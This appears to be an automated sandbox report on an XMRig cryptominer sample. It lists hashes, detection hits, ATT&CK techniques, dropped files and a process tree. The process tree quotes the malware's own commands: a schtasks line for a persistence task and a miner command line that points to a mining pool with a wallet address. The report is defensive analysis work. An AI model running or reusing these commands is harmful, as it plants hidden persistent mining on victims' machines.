xmrig | fd7e18469b06d1a65fcf9552b96ffe957ed2608e9d633b55654a7489301a2e7d

Analysis

max time kernel
149s
max time network
160s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
01/08/2023, 01:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

292dfc51466e2e6be358d0f3ef5a29b6.exe
Size

591.2MB
MD5

292dfc51466e2e6be358d0f3ef5a29b6
SHA1

8ab6e52826ba1e6fc4dd7052c284ba4d964b270a
SHA256

fd7e18469b06d1a65fcf9552b96ffe957ed2608e9d633b55654a7489301a2e7d
SHA512

2c2687e0e7d471bebd572d9d460db89b30543924f305b1cc1428ddfadf944f607ed785509e157df4fae7b85dacd55b6bd676953c86d22c4b47d013195a4d7872
SSDEEP

49152:IvGsg/k3g4rxKao6jOUEfnvto8Sp8EsdMeCL9:qGsg/U9N4/vG808xO

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 18 IoCs

miner

resource	yara_rule
behavioral1/memory/2876-87-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2876-88-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2876-89-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2876-90-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2876-91-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2876-92-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2876-93-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2876-94-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2876-97-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2876-100-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2876-102-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2876-103-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2876-104-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2876-105-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2876-106-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2876-107-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2876-108-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2876-109-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

pid	Process
1812	NCADT.exe

Loads dropped DLL 1 IoCs

pid	Process
2940	cmd.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1812 set thread context of 2876	1812	NCADT.exe	38

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2744	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2136	timeout.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1812	NCADT.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
468	Process not Found

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2572	292dfc51466e2e6be358d0f3ef5a29b6.exe
Token: SeDebugPrivilege	1812	NCADT.exe
Token: SeLockMemoryPrivilege	2876	ngen.exe
Token: SeLockMemoryPrivilege	2876	ngen.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2876	ngen.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 2572 wrote to memory of 2940	2572	292dfc51466e2e6be358d0f3ef5a29b6.exe	30
PID 2572 wrote to memory of 2940	2572	292dfc51466e2e6be358d0f3ef5a29b6.exe	30
PID 2572 wrote to memory of 2940	2572	292dfc51466e2e6be358d0f3ef5a29b6.exe	30
PID 2940 wrote to memory of 2136	2940	cmd.exe	32
PID 2940 wrote to memory of 2136	2940	cmd.exe	32
PID 2940 wrote to memory of 2136	2940	cmd.exe	32
PID 2940 wrote to memory of 1812	2940	cmd.exe	33
PID 2940 wrote to memory of 1812	2940	cmd.exe	33
PID 2940 wrote to memory of 1812	2940	cmd.exe	33
PID 1812 wrote to memory of 2856	1812	NCADT.exe	34
PID 1812 wrote to memory of 2856	1812	NCADT.exe	34
PID 1812 wrote to memory of 2856	1812	NCADT.exe	34
PID 2856 wrote to memory of 2744	2856	cmd.exe	36
PID 2856 wrote to memory of 2744	2856	cmd.exe	36
PID 2856 wrote to memory of 2744	2856	cmd.exe	36
PID 1812 wrote to memory of 2876	1812	NCADT.exe	38
PID 1812 wrote to memory of 2876	1812	NCADT.exe	38
PID 1812 wrote to memory of 2876	1812	NCADT.exe	38
PID 1812 wrote to memory of 2876	1812	NCADT.exe	38
PID 1812 wrote to memory of 2876	1812	NCADT.exe	38
PID 1812 wrote to memory of 2876	1812	NCADT.exe	38
PID 1812 wrote to memory of 2876	1812	NCADT.exe	38
PID 1812 wrote to memory of 2876	1812	NCADT.exe	38
PID 1812 wrote to memory of 2876	1812	NCADT.exe	38
PID 1812 wrote to memory of 2876	1812	NCADT.exe	38
PID 1812 wrote to memory of 2876	1812	NCADT.exe	38
PID 1812 wrote to memory of 2876	1812	NCADT.exe	38
PID 1812 wrote to memory of 2876	1812	NCADT.exe	38
PID 1812 wrote to memory of 2876	1812	NCADT.exe	38
PID 1812 wrote to memory of 2876	1812	NCADT.exe	38

C:\Users\Admin\AppData\Local\Temp\292dfc51466e2e6be358d0f3ef5a29b6.exe
"C:\Users\Admin\AppData\Local\Temp\292dfc51466e2e6be358d0f3ef5a29b6.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2572
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpDEDA.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2940
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:2136
- - C:\ProgramData\BuffDllsys\NCADT.exe
    "C:\ProgramData\BuffDllsys\NCADT.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1812
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "NCADT" /tr "C:\ProgramData\BuffDllsys\NCADT.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2856
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "NCADT" /tr "C:\ProgramData\BuffDllsys\NCADT.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:2744
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a cryptonight-heavy --url=pool.supportxmr.com:5555 -u 4AAvbZFu6CJe2k13FgFmnDWHasLSbsKpXNumeQrWnZU8gpV9dURkEmJYtTYSohPLrCYA8bBN5PJRWbo1qgLuzpyNApcPYRh -R --variant=-1 --max-cpu-usage=50 --donate-level=1 -opencl
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:2876

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\BuffDllsys\NCADT.exe

Filesize
484.2MB

MD5
0d93ab1d6159652dc9bee612be0d48b0

SHA1
69eda8507acae04b29eba28a55b5eb6e700915a7

SHA256
5fb0874d4cfe80d8ce7a54535d3cf2fa373e93ed86e07406412df1c3150c6bb4

SHA512
ab0c75aeeea4ae5a94d2afe1800fa5a26cf800a2852289337aa48361f92d9e4c0de8f6f23198fb6d373028e9a3d76b5f86e9b59c818be097a8b60a86493b1174

Download Submit
C:\ProgramData\BuffDllsys\NCADT.exe

Filesize
609.9MB

MD5
5821d2fdfb8014bf90aae7ba53b30bbc

SHA1
f7a96fdf51445315ac92cbae181cfc4f955725d7

SHA256
7ad6dc451a9344debc2101be40f315cd7202d734500a8cfb257d38b54971e433

SHA512
c0b9cd6038c46a2680052927e9276b775f3d931f4744b7330f7591894a3f9ee6756884963af28ebcc78ccb869ca106044d63e242c5b79685310e422b0f9f9dd0

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpDEDA.tmp.bat

Filesize
144B

MD5
e9e71c866f807d134faf99e22d1eab63

SHA1
e154ade59075596abc4901ae0eb842f30c6dbe2a

SHA256
407f425af802991abbc3155e1e5edd2bdab49f8a6da374fdd7a5cde591364706

SHA512
c8de7d4203c22f3bd965b1c0c9e5d87b3607a41ec4853b405d05faa9b1d375f041afcd856004d87f3cfd756456bfc73710533bceb90c6260ac218ee4a71b76d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpDEDA.tmp.bat

Filesize
144B

MD5
e9e71c866f807d134faf99e22d1eab63

SHA1
e154ade59075596abc4901ae0eb842f30c6dbe2a

SHA256
407f425af802991abbc3155e1e5edd2bdab49f8a6da374fdd7a5cde591364706

SHA512
c8de7d4203c22f3bd965b1c0c9e5d87b3607a41ec4853b405d05faa9b1d375f041afcd856004d87f3cfd756456bfc73710533bceb90c6260ac218ee4a71b76d5

Download Submit
\ProgramData\BuffDllsys\NCADT.exe

Filesize
594.8MB

MD5
cb24a1e60a39d6346575bcc3000378c7

SHA1
813e5315225f02e8e168f164712eb5ed7ab4f677

SHA256
182fb3909ca4a85ec1ca36468961139fa051f5149cd1a9a4af1b9a260c5028c6

SHA512
2ada94e9205fdc827e38b0f67431537c842fd66546f924ce94b92d8ad28033d5b5f95d5196aafbabba87f7f2ff73dd011633a09f12f54b5c8d703a34c9c36ca5

Download Submit
memory/1812-98-0x000007FEF4870000-0x000007FEF525C000-memory.dmp

Filesize
9.9MB

Download
memory/1812-76-0x000007FEF4870000-0x000007FEF525C000-memory.dmp

Filesize
9.9MB

Download
memory/1812-77-0x0000000001040000-0x00000000012C2000-memory.dmp

Filesize
2.5MB

Download
memory/1812-78-0x000000001B4D0000-0x000000001B550000-memory.dmp

Filesize
512KB

Download
memory/1812-79-0x0000000000340000-0x0000000000341000-memory.dmp

Filesize
4KB

Download
memory/1812-80-0x000007FEF4870000-0x000007FEF525C000-memory.dmp

Filesize
9.9MB

Download
memory/2572-60-0x000000001B2B0000-0x000000001B330000-memory.dmp

Filesize
512KB

Download
memory/2572-59-0x000007FEF5260000-0x000007FEF5C4C000-memory.dmp

Filesize
9.9MB

Download
memory/2572-71-0x000007FEF5260000-0x000007FEF5C4C000-memory.dmp

Filesize
9.9MB

Download
memory/2572-57-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/2572-56-0x000000001B2B0000-0x000000001B330000-memory.dmp

Filesize
512KB

Download
memory/2572-55-0x000007FEF5260000-0x000007FEF5C4C000-memory.dmp

Filesize
9.9MB

Download
memory/2572-54-0x00000000010E0000-0x0000000001362000-memory.dmp

Filesize
2.5MB

Download
memory/2876-91-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-97-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-87-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-88-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-89-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-90-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-85-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-92-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-93-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-95-0x000007FFFFFD4000-0x000007FFFFFD5000-memory.dmp

Filesize
4KB

Download
memory/2876-94-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-86-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-84-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-100-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-101-0x00000000001F0000-0x0000000000210000-memory.dmp

Filesize
128KB

Download
memory/2876-102-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-103-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-104-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-105-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-106-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-107-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-108-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-109-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2876-110-0x0000000000460000-0x0000000000480000-memory.dmp

Filesize
128KB

Download